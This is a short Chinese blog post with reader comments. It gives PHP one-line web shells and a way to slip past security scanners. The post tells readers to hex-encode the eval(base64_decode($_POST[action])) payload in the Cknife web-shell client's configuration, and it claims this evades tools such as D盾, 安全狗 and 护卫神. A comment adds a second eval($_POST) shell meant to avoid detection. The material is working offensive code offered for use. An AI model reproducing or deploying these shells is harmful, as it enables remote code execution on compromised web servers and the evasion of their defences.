可能过90% 安全软件和waf的PHP一句话。
PHP代码:
修改Cknife配置文件:
把
PHP_MAKE=@eval\u0001(base64_decode($_POST[action]));
修改成
PHP_MAKE=406576616C286261736536345F6465636F646528245F504F53545B616374696F6E5D29293B
已测 过D盾、安全狗、护卫神
其实还有一个更简短的方法,暂时不放出来了。。放的多容易被喷。
本文作者为Mr.Wu,转载请注明,尊守博主劳动成果!
由于经常折腾代码,可能会导致个别文章内容显示错位或者别的 BUG 影响阅读; 如发现请在该文章下留言告知于我,thank you !
function fun()
{@$b=($_POST[a]);
return @$b;
}
eval(fun());
D盾貌似不杀不带$的eval()
兄台,是t00ls的 xiaoniu?